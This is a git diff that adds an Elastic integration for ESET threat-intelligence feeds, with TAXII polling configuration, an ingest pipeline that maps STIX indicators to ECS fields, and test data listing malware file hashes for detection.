b/packages/ti_eset/data_stream/domains/_dev/test/system/test-httpjson-config.yml @@ -0,0 +1,13 @@ +input: httpjson +service: eti +vars: + username: test + password: test +data_stream: + vars: + preserve_original_event: true + url: http://{{Hostname}}:{{Port}}/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/a34aa0a4f9de419582a883863503f9c4/objects/ + interval: 30s + enable_request_tracer: true +assert: + hit_count: 2 diff --git a/packages/ti_eset/data_stream/domains/agent/stream/httpjson.yml.hbs b/packages/ti_eset/data_stream/domains/agent/stream/httpjson.yml.hbs new file mode 100644 index 00000000000..41117cedade --- /dev/null +++ b/packages/ti_eset/data_stream/domains/agent/stream/httpjson.yml.hbs @@ -0,0 +1,72 @@ +config_version: "2" + +interval: {{interval}} +request.method: "GET" +{{#if enable_request_tracer}} +request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson" +{{/if}} + +auth.basic.user: {{username}} +auth.basic.password: {{password}} + +{{#if url}} +request.url: {{url}} +{{/if}} +{{#if ssl}} +request.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +request.timeout: {{http_client_timeout}} +{{/if}} +{{#if proxy_url}} +request.proxy_url: {{proxy_url}} +{{/if}} + +request.transforms: + - set: + target: header.Content-Type + value: application/taxii+json;version=2.1 + - set: + target: header.Accept + value: application/taxii+json;version=2.1 + - set: + target: url.params.match[type] + value: indicator + - set: + target: url.params.limit + value: {{page_size}} + - set: + target: url.params.added_after + value: '[[ .cursor.timestamp ]]' + default: '[[ formatDate (now (parseDuration "-{{initial_interval}}")) "2006-01-02T15:04:05.000Z" ]]' + +response.pagination: + - set: + target: url.params.added_after + value: >- + [[ if .last_response.body.more ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ end ]] + fail_on_template_error: true + +response.split: + target: body.objects + +cursor: + timestamp: + value: >- + [[ if .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ else ]][[.last_response.url.params.Get "added_after"]][[ end ]] + ignore_empty_value: true + +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/ti_eset/data_stream/domains/elasticsearch/ilm/default_policy.json b/packages/ti_eset/data_stream/domains/elasticsearch/ilm/default_policy.json new file mode 100644 index 00000000000..459c9fffc4e --- /dev/null +++ b/packages/ti_eset/data_stream/domains/elasticsearch/ilm/default_policy.json @@ -0,0 +1,23 @@ +{ + "policy": { + "phases": { + "delete": { + "actions": { + "delete": {} + }, + "min_age": "7d" + }, + "hot": { + "actions": { + "rollover": { + "max_age": "2d", + "max_size": "50gb" + }, + "set_priority": { + "priority": 100 + } + } + } + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/domains/elasticsearch/ingest_pipeline/default.yml b/packages/ti_eset/data_stream/domains/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..6a2eb21d2b8 --- /dev/null +++ b/packages/ti_eset/data_stream/domains/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,152 @@ +--- +description: Pipeline for processing domains collection feed +processors: + - set: + field: ecs.version + value: '8.11.0' + - set: + field: event.kind + value: enrichment + - append: + field: event.category + value: threat + allow_duplicates: false + - append: + field: event.type + value: indicator + allow_duplicates: false + - set: + field: threat.indicator.provider + value: eset + - rename: + field: message + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + target_field: eti + - drop: + if: ctx.eti?.type != 'indicator' + - set: + field: threat.feed.name + value: "ESET Domain stix 2.1" + - date: + field: eti.created + target_field: "@timestamp" + formats: + - "ISO8601" + if: "ctx.eti?.created != null" + - date: + field: eti.modified + target_field: threat.indicator.last_seen + formats: + - "ISO8601" + if: "ctx.eti?.modified != null" + - set: + field: threat.indicator.modified_at + copy_from: threat.indicator.last_seen + if: "ctx.threat?.indicator?.last_seen != null" + - date: + field: eti.valid_until + target_field: eset.valid_until + formats: + - "ISO8601" + if: "ctx.eti?.valid_until != null" + - rename: + field: eti.id + target_field: eset.id + ignore_missing: true + - rename: + field: eti.description + target_field: threat.indicator.description + ignore_missing: true + - foreach: + field: eti.labels + processor: + append: + field: eset.labels + value: "{{_ingest._value}}" + ignore_missing: true + ignore_failure: true + if: ctx.eti?.labels != null + - script: + lang: painless + params: + "benign": 'Low' + "malicious-activity": 'High' + "phishing-activity": 'High' + "unwanted-activity": 'Medium' + if: ctx.eset?.labels != null + source: > + for (def label : ctx.eset.labels) { + if (params.containsKey(label)) { + ctx.threat.indicator.confidence = params.get(label); + break; + } + } + - split: + field: eti.pattern + target_field: eti._patterns + separator: ' OR ' + ignore_missing: true + - foreach: + field: eti._patterns + if: "ctx.eti?._patterns != null" + processor: + grok: + field: _ingest._value + patterns: + - "^\\[?domain-name:value='%{DATA:threat.indicator.url.original}'\\]?" + ignore_failure: true + - set: + field: threat.indicator.url.domain + copy_from: threat.indicator.url.original + if: "ctx.threat?.indicator?.url?.original != null" + - set: + field: threat.indicator.type + value: url + - set: + field: threat.indicator.name + copy_from: eti.name + if: "ctx.eti?.name != null" + - remove: + field: + - eti + ignore_missing: true + - remove: + field: event.original + if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + ignore_failure: true + ignore_missing: true + - script: + tag: script_to_drop_null_values + lang: painless + description: Drops null/empty values recursively. + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - set: + field: error.message + value: '{{ _ingest.on_failure_message }}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error \ No newline at end of file diff --git a/packages/ti_eset/data_stream/domains/fields/agent.yml b/packages/ti_eset/data_stream/domains/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_eset/data_stream/domains/fields/agent.yml @@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' + - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. diff --git a/packages/ti_eset/data_stream/domains/fields/base-fields.yml b/packages/ti_eset/data_stream/domains/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/ti_eset/data_stream/domains/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/ti_eset/data_stream/domains/fields/ecs.yml b/packages/ti_eset/data_stream/domains/fields/ecs.yml new file mode 100644 index 00000000000..f127a34e100 --- /dev/null +++ b/packages/ti_eset/data_stream/domains/fields/ecs.yml @@ -0,0 +1,38 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: event.category +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.created +- external: ecs + name: tags +- external: ecs + name: threat.indicator.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.url.domain +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.feed.name diff --git a/packages/ti_eset/data_stream/domains/fields/fields.yml b/packages/ti_eset/data_stream/domains/fields/fields.yml new file mode 100644 index 00000000000..bf7e7383df2 --- /dev/null +++ b/packages/ti_eset/data_stream/domains/fields/fields.yml @@ -0,0 +1,21 @@ +- name: eset + type: group + description: > + Fields for ESET Threat Intelligence + + fields: + - name: id + type: keyword + description: The UID of the event object. + - name: valid_until + type: date + description: >- + Event expiration date. + - name: labels + type: keyword + description: >- + Threat labels. +- name: labels.is_ioc_transform_source + type: constant_keyword + value: 'true' + description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. diff --git a/packages/ti_eset/data_stream/domains/lifecycle.yml b/packages/ti_eset/data_stream/domains/lifecycle.yml new file mode 100644 index 00000000000..326b14e00f6 --- /dev/null +++ b/packages/ti_eset/data_stream/domains/lifecycle.yml @@ -0,0 +1 @@ +data_retention: 7d diff --git a/packages/ti_eset/data_stream/domains/manifest.yml b/packages/ti_eset/data_stream/domains/manifest.yml new file mode 100644 index 00000000000..01c11981843 --- /dev/null +++ b/packages/ti_eset/data_stream/domains/manifest.yml @@ -0,0 +1,95 @@ +title: "Domain" +type: logs +ilm_policy: logs-ti_eset.domains-default_policy +streams: + - input: httpjson + title: Domain + description: Collect data from ETI Domain feed + template_path: httpjson.yml.hbs + vars: + - name: url + description: URL with API root and identifier of Domain collection as described by [TAXII v2.1 standard](https://docs.oasis-open.org/cti/taxii/v2.1/os/taxii-v2.1-os.html#_Toc31107514) + type: text + title: Collection URL + multi: false + required: true + show_user: true + default: https://taxii.eset.com/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/a34aa0a4f9de419582a883863503f9c4/objects/ + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: false + show_user: false + default: 1m + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http\[s\]://:@: + - name: interval + type: text + title: Interval + description: Interval at which the logs will be pulled. Supported units for this parameter are h/m/s. + multi: false + required: true + show_user: true + default: 1h + - name: initial_interval + type: text + title: Initial Interval + multi: false + required: true + show_user: false + default: 48h + description: How far back to look for indicators the first time the agent is started. Supported units for this parameter are h/m/s. + - name: page_size + type: integer + multi: false + required: false + default: "1000" + show_user: false + title: Page size + description: Maximum number of records to pull in one request. + - name: ssl + type: yaml + title: SSL + multi: false + required: false + show_user: false + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - eset-domains + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original` + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: > + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + diff --git a/packages/ti_eset/data_stream/domains/sample_event.json b/packages/ti_eset/data_stream/domains/sample_event.json new file mode 100644 index 00000000000..77c5ae1097a --- /dev/null +++ b/packages/ti_eset/data_stream/domains/sample_event.json @@ -0,0 +1,70 @@ +{ + "@timestamp": "2023-10-19T02:00:28.000Z", + "agent": { + "ephemeral_id": "6f2d8296-ddcf-4634-867b-00b524eb387c", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.domains", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--dfb05726-f2be-43c8-a5b2-48e78cc05286", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-21T02:00:28.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:20:11.664Z", + "dataset": "ti_eset.domains", + "ingested": "2024-03-27T14:20:23Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:00:28.000Z\",\"description\":\"Host is known to be actively distributing adware or other medium-risk software.\",\"id\":\"indicator--dfb05726-f2be-43c8-a5b2-48e78cc05286\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-19T02:00:28.000Z\",\"name\":\"example.com\",\"pattern\":\"[domain-name:value='example.com']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:00:28Z\",\"valid_until\":\"2023-10-21T02:00:28Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-domains" + ], + "threat": { + "feed": { + "name": "ESET Domain stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Host is known to be actively distributing adware or other medium-risk software.", + "last_seen": "2023-10-19T02:00:28.000Z", + "modified_at": "2023-10-19T02:00:28.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "domain": "example.com", + "original": "example.com" + } + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-common-config.yml b/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-eset-ndjson.log b/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-eset-ndjson.log new file mode 100644 index 00000000000..24eed79d731 --- /dev/null +++ b/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-eset-ndjson.log @@ -0,0 +1,11 @@ +{"created":"2023-11-15T05:00:09.6Z","description":"Each of these file hashes indicates that a variant of a variant of Win32/Injector.ETLW trojan is present.","id":"indicator--70b84911-a3e0-4c20-a0d3-e5df95d03fbc","labels":["malicious-activity"],"modified":"2023-11-15T05:00:09.642619Z","name":"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7","pattern":"[file:hashes.'SHA-256'='13a659b3fdd04c558b4758653bec387d96ff0414dee74a873735f5ec31f915ea'] OR [file:hashes.'SHA-1'='7bf71d325e777c7a8ac6a29486a26f208bde2c6e'] OR [file:hashes.'MD5'='7c60dda0a4dda9abf2956cc35c8482e2']","pattern_type":"stix","pattern_version":"2.1","spec_version":"indicator","type":"indicator","valid_from":"2023-11-15T05:00:09.642619Z","valid_until":"2023-11-17T05:00:09.642619Z"} +{"id": "indicator--dafe4edd-2e79-4c62-8512-c39e6c1e2bcb", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of a variant of Win32/AutoRun.Agent.UD worm is present.", "pattern": "[file:hashes.'SHA-256'='009628403d1f5ea6d5e0c47e0b6481013c2b6ea7caf65e599904f3212b2611a5'] OR [file:hashes.'SHA-1'='0721deb7d7afb22a38be8c68db4d9bebc1d075b8'] OR [file:hashes.'MD5'='1a57c6496aef72a6996d412db68992e7']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--8be4c888-fbdd-4869-9d9c-e542a5d8399d", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of a variant of Win32/TrojanDropper.Agent.PQT trojan is present.", "pattern": "[file:hashes.'SHA-256'='1058ee33ef745284039b31ac92c3a73e7eed4f8e6bd29e0d64a7ebdfd2231321'] OR [file:hashes.'SHA-1'='08af85f31499678205bf70280fafc421ea16c9e2'] OR [file:hashes.'MD5'='c31852836acbbec2101824999b482de3']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--3e578440-30e0-4b0f-ad66-53a282f7738f", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of VBS/Agent.QMG trojan is present.", "pattern": "[file:hashes.'SHA-256'='73c6acbf14cd7e70dd16a6a50baae785bf9cdc8c2a789be2cf16835c746dc9ce'] OR [file:hashes.'SHA-1'='0e75962a268970913d37598d526dc8470a5a7b66'] OR [file:hashes.'MD5'='dbb31d7036f2619928a1268a7ccc6a80']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--ca3219e3-9e83-4236-b96e-a97c1878ea4f", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of HTML/Fraud.CX trojan is present.", "pattern": "[file:hashes.'SHA-256'='2bb279b89bef3adbef32fac40a50f3d7d26e1afb24ff1d803b186af9a4bb5425'] OR [file:hashes.'SHA-1'='237b4cd335ff7350e3df23ff42b2e1a2607d463d'] OR [file:hashes.'MD5'='99a95a2f3a5dffe722b1c7e5088337b6']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--e49799ce-208c-4fab-967d-3eb2c3e71b1b", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of a variant of Win32/GenKryptik.GOVN trojan is present.", "pattern": "[file:hashes.'SHA-256'='c84aa7aad50629e8292a023270928903eb002b0673d854354df38ed8a85ae029'] OR [file:hashes.'SHA-1'='35813c9a4e49b3d9dd1740c0b6dc4dde1f97c8dd'] OR [file:hashes.'MD5'='d7244c4828f5189d018108741b0e5ae4']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--9babb86e-0e2f-442c-9b37-5cd05198f58f", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of NSIS/Injector.ASH trojan is present.", "pattern": "[file:hashes.'SHA-256'='1a3fcc316f4b8b404415a1e22f414431144fe6798374cc860a40eddceae9c31d'] OR [file:hashes.'SHA-1'='489bd8f3ea436f212ad8894041e458737894c830'] OR [file:hashes.'MD5'='35a8d09f90bf40a9efc1c374411bec49']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--1fb40180-521f-470f-95bb-b449282bd636", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of JS/Kryptik.BMZ trojan is present.", "pattern": "[file:hashes.'SHA-256'='b3a0353cdc10e06931a302c9a04ed58cc37b13c438ab7de1b37ea650b63e874b'] OR [file:hashes.'SHA-1'='6a42a72596ff639912e6f130926b9fe7d3d95647'] OR [file:hashes.'MD5'='2554bb1d8059a68cf7a42e5fec72a0de']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--78b8e233-0cab-4d54-8474-7af5f271b96c", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of JS/ScrInject.B trojan is present.", "pattern": "[file:hashes.'SHA-256'='f772194ec4bc9baf384bbee2e483e09ba2f4b9d3b2fbba2978b667c0447bb4c2'] OR [file:hashes.'SHA-1'='74dc6715edd2fcfd12f28359f3efca038e9300ac'] OR [file:hashes.'MD5'='46f845c419d4ed6c899bde1b3a16c344']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--abab1f5a-69bb-4703-baaf-1579f0717d5a", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of HTML/Refresh.AUD trojan is present.", "pattern": "[file:hashes.'SHA-256'='a3ac8a9425b52564fddf4309d2ae597a48b70df5deed2b08bd1cf92bdbe6aba3'] OR [file:hashes.'SHA-1'='8a4489c702681aab936aa931b6df312c2720c119'] OR [file:hashes.'MD5'='9bd51aabb0b341a7d072794394e09f86']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--9baf483f-9dd8-464b-ab81-22e729547c59", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of HTML/Phishing.Agent.AUW trojan is present.", "pattern": "[file:hashes.'SHA-256'='c75b7ec26ef3d6ce1578e0c80ecf124285c0714da0023813bc45f6141f4c5fb5'] OR [file:hashes.'SHA-1'='aacb3c991ce8b1fcc92b353fb82a71cb45487e5e'] OR [file:hashes.'MD5'='73631f9ce0efc3e9ac1d296fcc5af3aa']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-eset-ndjson.log-expected.json b/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-eset-ndjson.log-expected.json new file mode 100644 index 00000000000..cd7dbd3bcbc --- /dev/null +++ b/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-eset-ndjson.log-expected.json @@ -0,0 +1,521 @@ +{ + "expected": [ + { + "@timestamp": "2023-11-15T05:00:09.600Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--70b84911-a3e0-4c20-a0d3-e5df95d03fbc", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-11-17T05:00:09.642Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\":\"2023-11-15T05:00:09.6Z\",\"description\":\"Each of these file hashes indicates that a variant of a variant of Win32/Injector.ETLW trojan is present.\",\"id\":\"indicator--70b84911-a3e0-4c20-a0d3-e5df95d03fbc\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-11-15T05:00:09.642619Z\",\"name\":\"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\",\"pattern\":\"[file:hashes.'SHA-256'='13a659b3fdd04c558b4758653bec387d96ff0414dee74a873735f5ec31f915ea'] OR [file:hashes.'SHA-1'='7bf71d325e777c7a8ac6a29486a26f208bde2c6e'] OR [file:hashes.'MD5'='7c60dda0a4dda9abf2956cc35c8482e2']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-11-15T05:00:09.642619Z\",\"valid_until\":\"2023-11-17T05:00:09.642619Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of a variant of Win32/Injector.ETLW trojan is present.", + "file": { + "hash": { + "md5": "7c60dda0a4dda9abf2956cc35c8482e2", + "sha1": "7bf71d325e777c7a8ac6a29486a26f208bde2c6e", + "sha256": "13a659b3fdd04c558b4758653bec387d96ff0414dee74a873735f5ec31f915ea" + } + }, + "last_seen": "2023-11-15T05:00:09.642Z", + "modified_at": "2023-11-15T05:00:09.642Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--dafe4edd-2e79-4c62-8512-c39e6c1e2bcb", + "labels": [ + "malicious-activity" + 